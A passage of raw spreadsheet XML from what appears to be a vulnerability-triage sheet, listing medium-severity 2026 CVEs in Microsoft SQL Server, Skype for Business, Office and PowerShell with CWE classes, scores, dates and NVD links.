/><c r="H1072" s="5" t="n"><v>0.005</v></c><c r="I1072" s="5" t="inlineStr" /><c r="J1072" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K10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72" s="5" t="inlineStr" /><c r="M1072" s="5" t="inlineStr" /><c r="N1072" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1072" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1072" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1072" s="5" t="inlineStr" /><c r="R1072" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="S1072" s="5" t="inlineStr"><is><t>Improper limitation of a pathname to a restricted directory ('path traversal') in Windows PowerShell allows an unauthorized attacker to bypass a security feature over a network.</t></is></c><c r="T1072" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62801</t></is></c></row><row r="1073"><c r="A1073" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1073" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1073" s="5" t="inlineStr"><is><t>CVE-2026-64918</t></is></c><c r="D1073" s="5" t="n"><v>6.5</v></c><c r="E1073" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1073" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1073" s="5" t="inlineStr" /><c r="H1073" s="5" t="n"><v>0.005</v></c><c r="I1073" s="5" t="inlineStr" /><c r="J1073" s="5" t="inlineStr" /><c r="K1073" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1073" s="5" t="inlineStr" /><c r="M1073" s="5" t="inlineStr" /><c r="N1073" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1073" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1073" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1073" s="5" t="inlineStr" /><c r="R1073" s="5" t="inlineStr"><is><t>CWE-522</t></is></c><c r="S1073" s="5" t="inlineStr"><is><t>Insufficiently protected credentials in Microsoft Office allows an unauthorized attacker to perform spoofing over a network.</t></is></c><c r="T1073" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-64918</t></is></c></row><row r="1074"><c r="A1074" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1074" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1074" s="5" t="inlineStr"><is><t>CVE-2026-66303</t></is></c><c r="D1074" s="5" t="n"><v>6.5</v></c><c r="E1074" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1074" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1074" s="5" t="inlineStr" /><c r="H1074" s="5" t="n"><v>0.008</v></c><c r="I1074" s="5" t="inlineStr" /><c r="J1074" s="5" t="inlineStr" /><c r="K1074" s="5" t="inlineStr"><is><t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t></is></c><c r="L1074" s="5" t="inlineStr" /><c r="M1074" s="5" t="inlineStr" /><c r="N1074" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1074" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1074" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1074" s="5" t="inlineStr" /><c r="R1074" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="S1074" s="5" t="inlineStr"><is><t>Null pointer dereference in Skype for Business allows an authorized attacker to deny service over a network.</t></is></c><c r="T1074" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66303</t></is></c></row><row r="1075"><c r="A1075" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1075" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1075" s="5" t="inlineStr"><is><t>CVE-2026-66306</t></is></c><c r="D1075" s="5" t="n"><v>6.5</v></c><c r="E1075" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1075" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1075" s="5" t="inlineStr" /><c r="H1075" s="5" t="n"><v>0.005</v></c><c r="I1075" s="5" t="inlineStr" /><c r="J1075" s="5" t="inlineStr" /><c r="K1075" s="5" t="inlineStr"><is><t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t></is></c><c r="L1075" s="5" t="inlineStr" /><c r="M1075" s="5" t="inlineStr" /><c r="N1075" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1075" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1075" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1075" s="5" t="inlineStr" /><c r="R1075" s="5" t="inlineStr"><is><t>CWE-209</t></is></c><c r="S1075" s="5" t="inlineStr"><is><t>Generation of error message containing sensitive information in Skype for Business allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1075" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66306</t></is></c></row><row r="1076"><c r="A1076" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1076" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1076" s="5" t="inlineStr"><is><t>CVE-2026-66308</t></is></c><c r="D1076" s="5" t="n"><v>6.5</v></c><c r="E1076" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1076" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1076" s="5" t="inlineStr" /><c r="H1076" s="5" t="n"><v>0.006</v></c><c r="I1076" s="5" t="inlineStr" /><c r="J1076" s="5" t="inlineStr" /><c r="K1076" s="5" t="inlineStr"><is><t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t></is></c><c r="L1076" s="5" t="inlineStr" /><c r="M1076" s="5" t="inlineStr" /><c r="N1076" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1076" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1076" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1076" s="5" t="inlineStr" /><c r="R1076" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1076" s="5" t="inlineStr"><is><t>Out-of-bounds read in Skype for Business allows an authorized attacker to deny service over a network.</t></is></c><c r="T1076" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66308</t></is></c></row><row r="1077"><c r="A1077" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1077" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1077" s="5" t="inlineStr"><is><t>CVE-2026-66816</t></is></c><c r="D1077" s="5" t="n"><v>6.5</v></c><c r="E1077" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1077" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1077" s="5" t="inlineStr" /><c r="H1077" s="5" t="n"><v>0.007</v></c><c r="I1077" s="5" t="inlineStr" /><c r="J1077" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1077" s="5" t="inlineStr"><is><t>microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1077" s="5" t="inlineStr" /><c r="M1077" s="5" t="inlineStr" /><c r="N1077" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1077" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1077" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1077" s="5" t="inlineStr" /><c r="R1077" s="5" t="inlineStr"><is><t>CWE-778</t></is></c><c r="S1077" s="5" t="inlineStr"><is><t>Insufficient logging in SQL Server allows an authorized attacker to bypass a security feature over a network.</t></is></c><c r="T1077" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66816</t></is></c></row><row r="1078"><c r="A1078" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1078" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1078" s="5" t="inlineStr"><is><t>CVE-2026-67369</t></is></c><c r="D1078" s="5" t="n"><v>6.5</v></c><c r="E1078" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1078" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1078" s="5" t="inlineStr" /><c r="H1078" s="5" t="n"><v>0.007</v></c><c r="I1078" s="5" t="inlineStr" /><c r="J1078" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1078" s="5" t="inlineStr"><is><t>microsoft:sql_server_2025</t></is></c><c r="L1078" s="5" t="inlineStr" /><c r="M1078" s="5" t="inlineStr" /><c r="N1078" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1078" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1078" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1078" s="5" t="inlineStr" /><c r="R1078" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1078" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1078" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67369</t></is></c></row><row r="1079"><c r="A1079" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1079" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1079" s="5" t="inlineStr"><is><t>CVE-2026-67383</t></is></c><c r="D1079" s="5" t="n"><v>6.5</v></c><c r="E1079" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1079" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1079" s="5" t="inlineStr" /><c r="H1079" s="5" t="n"><v>0.01</v></c><c r="I1079" s="5" t="inlineStr" /><c r="J1079" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1079" s="5" t="inlineStr"><is><t>microsoft:sql_server_2025</t></is></c><c r="L1079" s="5" t="inlineStr" /><c r="M1079" s="5" t="inlineStr" /><c r="N1079" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1079" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1079" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1079" s="5" t="inlineStr" /><c r="R1079" s="5" t="inlineStr"><is><t>CWE-209</t></is></c><c r="S1079" s="5" t="inlineStr"><is><t>Generation of error message containing sensitive information in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1079" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67383</t></is></c></row><row r="1080"><c r="A1080" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1080" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1080" s="5" t="inlineStr"><is><t>CVE-2026-67386</t></is></c><c r="D1080" s="5" t="n"><v>6.5</v></c><c r="E1080" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1080" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1080" s="5" t="inlineStr" /><c r="H1080" s="5" t="n"><v>0.007</v></c><c r="I1080" s="5" t="inlineStr" /><c r="J1080" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1080" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1080" s="5" t="inlineStr" /><c r="M1080" s="5" t="inlineStr" /><c r="N1080" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1080" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1080" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1080" s="5" t="inlineStr" /><c r="R1080" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S1080" s="5" t="inlineStr"><is><t>Use of uninitialized resource in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1080" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67386</t></is></c></row><row r="1081"><c r="A1081" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1081" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1081" s="5" t="inlineStr"><is><t>CVE-2026-67389</t></is></c><c r="D1081" s="5" t="n"><v>6.5</v></c><c r="E1081" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1081" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1081" s="5" t="inlineStr" /><c r="H1081" s="5" t="n"><v>0.007</v></c><c r="I1081" s="5" t="inlineStr" /><c r="J1081" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1081" s="5" t="inlineStr"><is><t>microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1081" s="5" t="inlineStr" /><c r="M1081" s="5" t="inlineStr" /><c r="N1081" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1081" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1081" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1081" s="5" t="inlineStr" /><c r="R1081" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1081" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1081" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67389</t></is></c></row><row r="1082"><c r="A1082" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1082" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1082" s="5" t="inlineStr"><is><t>CVE-2026-67390</t></is></c><c r="D1082" s="5" t="n"><v>6.5</v></c><c r="E1082" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1082" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1082" s="5" t="inlineStr" /><c r="H1082" s="5" t="n"><v>0.01</v></c><c r="I1082" s="5" t="inlineStr" /><c r="J1082" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1082" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1082" s="5" t="inlineStr" /><c r="M1082" s="5" t="inlineStr" /><c r="N1082" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1082" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1082" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1082" s="5" t="inlineStr" /><c r="R1082" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S1082" s="5" t="inlineStr"><is><t>Buffer over-read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1082" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67390</t></is></c></row><row r="1083"><c r="A1083" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1083" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1083" s="5" t="inlineStr"><is><t>CVE-2026-67393</t></is></c><c r="D1083" s="5" t="n"><v>6.5</v></c><c r="E1083" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1083" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1083" s="5" t="inlineStr" /><c r="H1083" s="5" t="n"><v>0.007</v></c><c r="I1083" s="5" t="inlineStr" /><c r="J1083" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1083" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1083" s="5" t="inlineStr" /><c r="M1083" s="5" t="inlineStr" /><c r="N1083" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1083" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1083" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1083" s="5" t="inlineStr" /><c r="R1083" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S1083" s="5" t="inlineStr"><is><t>Buffer over-read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1083" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67393</t></is></c></row><row r="1084"><c r="A1084" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1084" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1084" s="5" t="inlineStr"><is><t>CVE-2026-67624</t></is></c><c r="D1084" s="5" t="n"><v>6.5</v></c><c r="E1084" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1084" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1084" s="5" t="inlineStr" /><c r="H1084" s="5" t="n"><v>0.006</v></c><c r="I1084" s="5" t="inlineStr" /><c r="J1084" s="5" t="inlineStr" /><c r="K1084" s="5" t="inlineStr" /><c r="L1084" s="5" t="inlineStr" /><c r="M1084" s="5" t="inlineStr" /><c r="N1084" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1084" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1084" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1084" s="5" t="inlineStr" /><c r="R1084" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1084" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1084" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67624</t></is></c></row><row r="1085"><c r="A1085" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1085" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1085" s="5" t="inlineStr"><is><t>CVE-2026-67629</t></is></c><c r="D1085" s="5" t="n"><v>6.5</v></c><c r="E1085" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1085" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1085" s="5" t="inlineStr" /><c r="H1085" s="5" t="n"><v>0.007</v></c><c r="I1085" s="5" t="inlineStr" /><c r="J1085" s="5" t="inlineStr" /><c r="K1085" s="5" t="inlineStr" /><c r="L1085" s="5" t="inlineStr" /><c r="M1085" s="5" t="inlineStr" /><c r="N1085" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1085" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1085" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1085" s="5" t="inlineStr" /><c r="R1085" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1085" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1085" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67629</t></is></c></row><row r="1086"><c r="A1086" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1086" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1086" s="5" t="inlineStr"><is><t>CVE-2026-67630</t></is></c><c r="D1086" s="5" t="n"><v>6.5</v></c><c r="E1086" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1086" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1086" s="5" t="inlineStr" /><c r="H1086" s="5" t="n"><v>0.007</v></c><c r="I1086" s="5" t="inlineStr" /><c r="J1086" s="5" t="inlineStr" /><c r="K1086" s="5" t="inlineStr" /><c r="L1086" s="5" t="inlineStr" /><c r="M1086" s="5" t="inlineStr" /><c r="N1086" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1086" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1086" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1086" s="5" t="inlineStr" /><c r="R1086" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1086" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1086" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67630</t></is></c></row><row r="1087"><c r="A1087" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1087" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1087" s="5" t="inlineStr"><is><t>CVE-2026-67633</t></is></c><c r="D1087" s="5" t="n"><v>6.5</v></c><c r="E1087" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1087" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1087" s="5" t="inlineStr" /><c r="H1087" s="5" t="n"><v>0.008</v></c><c r="I1087" s="5" t="inlineStr" /><c r="J1087" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1087" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1087" s="5" t="inlineStr" /><c r="M1087" s="5" t="inlineStr" /><c r="N1087" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1087" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1087" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1087" s="5" t="inlineStr" /><c r="R1087" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1087" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to deny service over a network.</t></is></c><c r="T1087" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67633</t></is></c></row><row r="1088"><c r="A1088" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1088" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1088" s="5" t="inlineStr"><is><t>CVE-2026-67641</t></is></c><c r="D1088" s="5" t="n"><v>6.5</v></c><c r="E1088" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1088" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1088" s="5" t="inlineStr" /><c r="H1088" s="5" t="n"><v>0.006</v></c><c r="I1088" s="5" t="inlineStr" /><c r="J1088" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1088" s="5" t="inlineStr"><is><t>microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1088" s="5" t="inlineStr" /><c r="M1088" s="5" t="inlineStr" /><c r="N1088" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1088" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1088" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1088" s="5" t="inlineStr" /><c r="R1088" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S1088" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in SQL Server allows an authorized attacker to deny service over a network.</t></is></c><c r="T1088" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67641</t></is></c></row><row r="1089"><c r="A1089" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1089" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1089" s="5" t="inlineStr"><is><t>CVE-2026-67645</t></is></c><c r="D1089" s="5" t="n"><v>6.5</v></c><c r="E1089" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1089" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1089" s="5" t="inlineStr" /><c r="H1089" s="5" t="n"><v>0.006</v></c><c r="I1089" s="5" t="inlineStr" /><c r="J1089" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1089" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1089" s="5" t="inlineStr" /><c r="M1089" s="5" t="inlineStr" /><c r="N1089" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1089" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1089" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1089" s="5" t="inlineStr" /><c r="R1089" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1089" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1089" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67645</t></is></c></row><row r="1090"><c r="A1090" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1090" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1090" s="5" t="inlineStr"><is><t>CVE-2026-67648</t></is></c><c r="D1090" s="5" t="n"><v>6.5</v></c><c r="E1090" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1090" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1090" s="5" t="inlineStr" /><c r="H1090" s="5" t="n"><v>0.006</v></c><c r="I1090" s="5" t="inlineStr" /><c r="J1090" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1090" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1090" s="5" t="inlineStr" /><c r="M1090" s="5" t="inlineStr" /><c r="N1090" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1090" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1090" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1090" s="5" t="inlineStr" /><c r="R1090" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S1090" s="5" t="inlineStr"><is><t>Use of uninitialized resource in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1090" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67648</t></is></c></row><row r="1091"><c r="A1091" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1091" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1091" s="5" t="inlineStr"><is><t>CVE-2026-68776</t></is></c><c r="D1091" s="5" t="n"><v>6.5</v></c><c r="E1091" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1091" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1091" s="5" t="inlineStr" /><c r="H1091" s="5" t="n"><v>0.006</v></c><c r="I1091" s="5" t="inlineStr" /><c r="J1091" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1091" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1091" s="5" t="inlineStr" /><c r="M1091" s="5" t="inlineStr" /><c r="N1091" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1091" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1091" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1091" s="5" t="inlineStr" /><c r="R1091" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S1091" s="5" t="inlineStr"><is><t>Use of uninitialized resource in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1091" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68776</t></is></c></row><row r="1092"><c r="A1092" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1092" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1092" s="5" t="inlineStr"><is><t>CVE-2026-68777</t></is></c><c r="D1092" s="5" t="n"><v>6.5</v></c><c r="E1092" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1092" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1092" s="5" t="inlineStr" /><c r="H1092" s="5" t="n"><v>0.007</v></c><c r="I1092" s="5" t="inlineStr" /><c r="J1092" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1092" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1092" s="5" t="inlineStr" /><c r="M1092" s="5" t="inlineStr" /><c r="N1092" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1092" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1092" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1092" s="5" t="inlineStr" /><c r="R1092" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1092" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1092" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68777</t></is></c></row><row r="1093"><c r="A1093" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1093" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1093" s="5" t="inlineStr"><is><t>CVE-2026-68778</t></is></c><c 